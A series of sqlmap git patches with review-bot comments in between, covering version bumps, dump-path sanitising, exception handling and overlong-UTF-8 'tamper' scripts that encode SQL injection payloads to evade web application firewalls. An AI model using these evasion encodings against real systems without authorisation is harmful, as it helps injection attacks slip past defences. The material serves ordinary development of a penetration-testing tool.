@@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -43cbf0f72f57279c6f65d531241e962c lib/controller/checks.py +a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py ccd66880fc677a3c83db2a3a70d196d7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b4bf9b1d887a7f992c1096132a0bec68 lib/core/settings.py +96752eb99f1d9a9f0562097d7557d5d3 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From aebfb7d5976815595067ef2e5afad094be83dbf0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Feb 2018 09:50:36 +0100 Subject: [PATCH 022/428] Update related to the #2912 --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index ae27ae60aed..b8d784cf59e 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -931,7 +931,7 @@ def _setTamperingFunctions(): try: module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) - except (ImportError, SyntaxError), ex: + except Exception, ex: raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex))) priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ 
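Review bot: In the option.py hunk, widening to `except Exception, ex:` rewraps every failure during the tamper script's import as `SqlmapSyntaxException`, including sqlmap's own exception types if the script raises them at module level and runtime errors that are not syntax problems, so the message `cannot import tamper script` can now be misleading. Since tamper scripts are user-supplied code executed via `__import__`, the broad catch is defensible, but a comment recording that — `# user-supplied tamper scripts can fail at import time in arbitrary ways (e.g. missing dependencies); report all of them as one error` — would explain the choice to the next reader. `_setTamperingFunctions` starts and ends outside the hunk.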
diff --git a/lib/core/settings.py b/lib/core/settings.py index e844d0f6a11..3a84441b2f4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.25" +VERSION = "1.2.2.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f7416cc568d..574108ef97e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 9eed2d4d370f375bda5e0c0488740e7f lib/core/optiondict.py -598863f3b058650c17f465b16892dc67 lib/core/option.py +02c846bf9fddbcb75afed72c0d6b9bdc lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -96752eb99f1d9a9f0562097d7557d5d3 lib/core/settings.py +b7bba78cd084d423c170eef9a6f5dd1f lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From ef8b2d793f38d8251e7ea909545f2191f6e34b57 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Feb 2018 10:27:10 +0100 Subject: [PATCH 023/428] Fixes #2910 --- lib/core/common.py | 6 +++++- lib/core/enums.py | 9 +++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 18 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 63d5f36cd31..67631b110e1 100644 
--- a/lib/core/common.py +++ b/lib/core/common.py @@ -75,6 +75,7 @@ from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import LOGGING_LEVELS from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import OPTION_TYPE from lib.core.enums import OS @@ -869,7 +870,10 @@ def boldifyMessage(message): def setColor(message, bold=False): retVal = message - level = extractRegexResult(r"\[(?P%s)\]" % '|'.join(_ for _ in dir(logging) if _ == _.upper()), message) or kb.get("stickyLevel") + level = extractRegexResult(r"\[(?P%s)\]" % '|'.join(_[0] for _ in getPublicTypeMembers(LOGGING_LEVELS)), message) or kb.get("stickyLevel") + + if isinstance(level, unicode): + level = unicodeencode(level) if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler if bold: diff --git a/lib/core/enums.py b/lib/core/enums.py index 849a6b314a1..7759986845f 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -22,6 +22,15 @@ class SORT_ORDER: FIFTH = 4 LAST = 100 +# Reference: https://docs.python.org/2/library/logging.html#logging-levels +class LOGGING_LEVELS: + NOTSET = 0 + DEBUG = 10 + INFO = 20 + WARNING = 30 + ERROR = 40 + CRITICAL = 50 + class DBMS: ACCESS = "Microsoft Access" DB2 = "IBM DB2" diff --git a/lib/core/settings.py b/lib/core/settings.py index 3a84441b2f4..f0c6367c41b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.0" +VERSION = "1.2.2.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 574108ef97e..f9cccc8c0e0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -27d1b0a4609eece643141408d1f18716 lib/core/common.py +17ab0324cb992a781cc197ec8c0209d7 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -35,7 +35,7 @@ e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py 1a94690d60ed792ce441b6f2f4dbbef8 lib/core/dump.py -2ef745b04933855e049ba7fdc98f57b8 lib/core/enums.py +c8551f7696a76450e6d139409e4f06cd lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b7bba78cd084d423c170eef9a6f5dd1f lib/core/settings.py +67ea2aee17da22379743e5dc18159f3f lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 62fc2e1e17347f911b02d636d50ef2e0b7db0037 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Feb 2018 10:48:47 +0100 Subject: [PATCH 024/428] Fixes #2911 --- lib/core/dump.py | 11 ++++++----- lib/core/settings.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 8 deletions(-) diff --git a/lib/core/dump.py b/lib/core/dump.py index 7a7928dbe85..33f68e63d91 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py 
@@ -46,6 +46,7 @@ from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE from lib.core.settings import TRIM_STDOUT_DUMP_SIZE from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT from lib.core.settings import WINDOWS_RESERVED_NAMES from thirdparty.magic import magic @@ -418,7 +419,7 @@ def dbTableValues(self, tableValues): except: warnFile = True - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db))) + _ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db))) dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8])) if not os.path.isdir(dumpDbPath): @@ -441,7 +442,7 @@ def dbTableValues(self, tableValues): dumpDbPath = tempDir - dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())) + dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) if not checkFile(dumpFileName, False): try: openFile(dumpFileName, "w+b").close() @@ -450,9 +451,9 @@ def dbTableValues(self, tableValues): except: warnFile = True - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table))) + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table))) if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table))) + _ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table))) dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower())) else: dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) 
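Review bot: The new `re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, ...)` only sanitises the table component of `dumpFileName`; the database component `dumpDbPath` is sanitised with `[^\w]` only in the `except` fallback near the top of the hunk, so if the `try` above it (outside the hunk) builds the directory from the raw `unsafeSQLIdentificatorNaming(db)` value, a database name containing `/`, `\` or consisting of `..` can still place dump files outside `conf.dumpPath`. Applying the same separator replacement to the db directory name, and rejecting the bare `.`/`..` names, would close that path. Both names originate from the target DBMS and should be treated as untrusted input. `dbTableValues` starts and ends outside the hunk.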
@@ -613,7 +614,7 @@ def dbTableValues(self, tableValues): if not os.path.isdir(dumpDbPath): os.makedirs(dumpDbPath, 0755) - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column))) + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column))) filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) logger.warn(warnMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index f0c6367c41b..d943db53c17 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.1" +VERSION = "1.2.2.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -424,6 +424,9 @@ # Maximum integer value MAX_INT = sys.maxint +# Replacement for unsafe characters in dump table filenames +UNSAFE_DUMP_FILEPATH_REPLACEMENT = '_' + # Options that need to be restored in multiple targets run mode RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f9cccc8c0e0..d9bf2cb80bc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
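Review bot: The comment on `UNSAFE_DUMP_FILEPATH_REPLACEMENT` in the settings.py hunk says "dump table filenames", but the same commit uses the constant for the database directory name and for the per-column `.bin` filename as well, so `# Replacement for unsafe characters in dump file and directory names (database, table and column components)` would describe it accurately. Since the value ends up in paths on every platform, a note that a replacement must stay safe on Windows too would help anyone tempted to change it from `'_'`.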
@@ -34,7 +34,7 @@ e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py 9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py -1a94690d60ed792ce441b6f2f4dbbef8 lib/core/dump.py +0d742fbf72bca25a3e82640616c30c9a lib/core/dump.py c8551f7696a76450e6d139409e4f06cd lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -67ea2aee17da22379743e5dc18159f3f lib/core/settings.py +e4a29b441ac8137ce22d7113dd2b72c5 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From a16663f9a16cfeda622c1d70d1210540d5a9708d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Feb 2018 16:05:41 +0100 Subject: [PATCH 025/428] Minor refactoring --- lib/controller/controller.py | 5 ++--- lib/core/settings.py | 2 +- lib/request/connect.py | 3 +-- txt/checksum.md5 | 6 +++--- 4 files changed, 7 insertions(+), 9 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index b491f3bd4b8..298fca10651 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py 
@@ -368,9 +368,8 @@ def start(): conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data else: - if targetUrl.find("?") > -1: - firstPart = targetUrl[:targetUrl.find("?")] - secondPart = targetUrl[targetUrl.find("?") + 1:] + if '?' in targetUrl: + firstPart, secondPart = targetUrl.split('?', 1) message = "Edit GET data [default: %s]: " % secondPart test = readInput(message, default=secondPart) test = _randomFillBlankFields(test) diff --git a/lib/core/settings.py b/lib/core/settings.py index d943db53c17..7de454f7f2c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.2" +VERSION = "1.2.2.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index c7001371bcd..1c62fa3b040 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -479,8 +479,7 @@ class _(dict): # Get HTTP response if hasattr(conn, "redurl"): - page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ - else Connect._connReadProxy(conn)) if not skipRead else None + page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d9bf2cb80bc..2e4cd3df54f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -22,7 +22,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py -ccd66880fc677a3c83db2a3a70d196d7 lib/controller/controller.py +f0e3f93f6a5275812e4d0c3e3a2a3701 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e4a29b441ac8137ce22d7113dd2b72c5 lib/core/settings.py +a2aed50a1a6605d67d688b524bda5f56 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -a38e09038468387b20e978ce1b885018 lib/request/connect.py +b3c3b71e9d4aeaa2ece681cabefc953d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py From 061c8da36b6208016a3091aba78b34f71ed1f5eb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Feb 2018 23:59:36 +0100 Subject: [PATCH 026/428] Proper overlongutf8.py (Issue #806) --- lib/core/settings.py | 2 +- tamper/overlongutf8.py | 5 +++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 5 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 7de454f7f2c..b1db0ebccd0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.3" +VERSION = "1.2.2.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index a8a9da412b9..6fc4a9081a5 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -20,9 +20,10 @@ def tamper(payload, **kwargs): encoded) Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') - 'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1' + 'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1' """ retVal = payload @@ -37,7 +38,7 @@ def tamper(payload, **kwargs): i += 3 else: if payload[i] not in (string.ascii_letters + string.digits): - retVal += "%%C0%%%.2X" % (0x8A | ord(payload[i])) + retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) else: retVal += payload[i] i += 1 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2e4cd3df54f..8cbdc1bdac0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a2aed50a1a6605d67d688b524bda5f56 lib/core/settings.py +20d4b1198a1583059a993ea7864c79c4 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -254,7 +254,7 @@ e44163d21e055805b5e55667e72f5978 tamper/modsecurityversioned.py f83a11d594fad3ed3291074c7b37b281 tamper/modsecurityzeroversioned.py abd6490408551a8c8226a32fbc2b5345 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py -aca15cb5474fb0a32e517ae5e940cbd0 tamper/overlongutf8.py +7de367954d124c29847c23909d82d92e tamper/overlongutf8.py bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py 4fa8b6c0e7573e395330bb6a405abbaf tamper/plus2concat.py 5b947c6cd78eab22ee53f5f534c532d3 tamper/plus2fnconcat.py From 5b99180ffe5d2fe0d304bd410b6eb84e6e6bcffd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 00:04:04 +0100 Subject: [PATCH 027/428] Update for an Issue #806 --- lib/core/settings.py | 2 +- tamper/overlongutf8.py | 3 +-- tamper/overlongutf8more.py | 42 ++++++++++++++++++++++++++++++++++++++ txt/checksum.md5 | 5 +++-- 4 files changed, 47 insertions(+), 5 deletions(-) create mode 100644 tamper/overlongutf8more.py diff --git a/lib/core/settings.py b/lib/core/settings.py index b1db0ebccd0..b3eb93948e5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.4" +VERSION = "1.2.2.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index 6fc4a9081a5..70d5ff76b40 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Converts all characters in a given payload (not processing already - encoded) + Converts all (non-alphanum) characters in a given payload (not processing already encoded) Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py new file mode 100644 index 00000000000..3d8a8753c64 --- /dev/null +++ b/tamper/overlongutf8more.py 
@@ -0,0 +1,42 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import string + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Converts all characters in a given payload (not processing already encoded) + + Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + + >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') + '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: + retVal += payload[i:i + 3] + i += 3 + else: + retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) + i += 1 + + return retVal diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8cbdc1bdac0..2a2a5ab74b7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -20d4b1198a1583059a993ea7864c79c4 lib/core/settings.py +15c5a15fc1c24170aff99c32d2bae75d lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 
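Review bot: `retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f))` is applied to every character, but the two-byte overlong form only exists for code points below 0x80; a character with `ord >= 0x80` produces a valid `C2`/`C3` sequence or, beyond 0xFF, a leading byte outside `C0`/`C1`, so the output is no longer "overlong UTF-8" for non-ASCII payloads. Guarding with `elif ord(payload[i]) < 0x80:` and appending the character unchanged in a final `else` would keep the output well-defined. The docstring should also state that, unlike `overlongutf8.py`, alphanumerics are encoded too, since that is the only difference between the two scripts.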
@@ -254,7 +254,8 @@ e44163d21e055805b5e55667e72f5978 tamper/modsecurityversioned.py f83a11d594fad3ed3291074c7b37b281 tamper/modsecurityzeroversioned.py abd6490408551a8c8226a32fbc2b5345 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py -7de367954d124c29847c23909d82d92e tamper/overlongutf8.py +e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py +b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py 4fa8b6c0e7573e395330bb6a405abbaf tamper/plus2concat.py 5b947c6cd78eab22ee53f5f534c532d3 tamper/plus2fnconcat.py From 56a4e507e824c07ff8aca0e5d40e858db3a460ce Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 16:49:16 +0100 Subject: [PATCH 028/428] Minor refactoring --- .github/CONTRIBUTING.md | 1 - lib/core/settings.py | 2 +- tamper/appendnullbyte.py | 4 +++- tamper/base64encode.py | 2 +- tamper/bluecoat.py | 2 +- tamper/charunicodeescape.py | 2 +- tamper/commalesslimit.py | 4 +++- tamper/commalessmid.py | 3 ++- tamper/commentbeforeparentheses.py | 2 +- tamper/concat2concatws.py | 4 +++- tamper/escapequotes.py | 2 +- tamper/informationschemacomment.py | 2 +- tamper/lowercase.py | 3 +-- tamper/modsecurityversioned.py | 4 +++- tamper/modsecurityzeroversioned.py | 4 +++- tamper/multiplespaces.py | 2 +- tamper/plus2concat.py | 6 +++-- tamper/plus2fnconcat.py | 6 +++-- tamper/randomcase.py | 2 +- txt/checksum.md5 | 36 +++++++++++++++--------------- 20 files changed, 53 insertions(+), 40 deletions(-) diff --git a/.github/CONTRIBUTING.md b/.github/CONTRIBUTING.md index 31b389e6070..2ae80685613 100644 --- a/.github/CONTRIBUTING.md +++ b/.github/CONTRIBUTING.md 
@@ -24,7 +24,6 @@ Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md)
